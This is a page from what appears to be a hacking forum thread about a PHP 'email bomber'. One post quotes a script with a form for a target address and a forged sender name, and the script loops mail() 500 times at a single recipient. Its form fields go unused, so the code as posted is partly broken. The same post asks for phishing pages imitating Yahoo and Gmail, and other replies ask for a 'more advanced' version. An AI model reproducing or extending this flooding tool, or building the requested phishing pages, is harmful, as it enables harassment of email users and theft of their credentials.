Login Register






Thread Rating:
  • 0 Vote(s) - 0 Average


E-mail Bomber Script [PHP] filter_list
Author
Message
RE: E-mail Bomber Script [PHP] #51
it's working but make it more advanced , this is so boring.

Reply

RE: E-mail Bomber Script [PHP] #52
(04-07-2014, 07:11 PM)CrackeRR Wrote: it's working but make it more advanced , this is so boring.

Dear i just posted. You can do changes in this script.. Smile
whoami;id

root
uid=0(root) gid=0(root) groups=0(root)

Reply

RE: E-mail Bomber Script [PHP] #53
(04-09-2013, 04:34 AM)The Alchemist Wrote:
(04-08-2013, 12:20 AM)midem2013 Wrote: ""  Parse error: syntax error, unexpected '<' in /home/a2515837/public_html/cj5jl36jh64832/Email Bomber By MiDOM/EmailBMB.php on line 3   ""

Fix or something ? :O
Sent it via HOTMAIL : midomdevil@hotmail.com

or PM HERE
Here is the working script :
Code:
<html>
<body>
<h1> Email Bomber Script</h1>

<table border=2>
<form action="" method=post>
<tr><td>Targat Email Address: </td><td><input type=text name=email size=30></td></tr>
<tr><td>Sender name: </td><td><input type=text name=name size=30></td></tr>
<tr><td>Sender Email Address: </td><td><input type=text name=sender size=30></td></tr>
<tr><td>Subject: </td><td><input type=text name=subject size=30></td></tr>
<tr><td>Content: </td><td><textarea rows=10 cols=30 name=content></textarea></td></tr>
<tr><td><input type=submit value="Send Mail"></td></tr>
</form>
</table>

<?php
$to = 'indianhacker@example.com';
$subject = 'the subject';
$message = 'hello';
$headers = 'From: webmaster@example.com' . "\r\n" .
'Reply-To: webmaster@example.com' . "\r\n" .
'X-Mailer: PHP/' . phpversion();

for ($i=1; $i <= 500; $i++)
{
mail($to, $subject, $message, $headers );
}
?></body></html>

Pls can you create a phishing page for me....yahoo, gmail and general page.

Reply

RE: E-mail Bomber Script [PHP] #54
Hi Guys!
Correct me if I'm wrong, but using this might get your IP blacklisted.

Reply







Users browsing this thread: 1 Guest(s)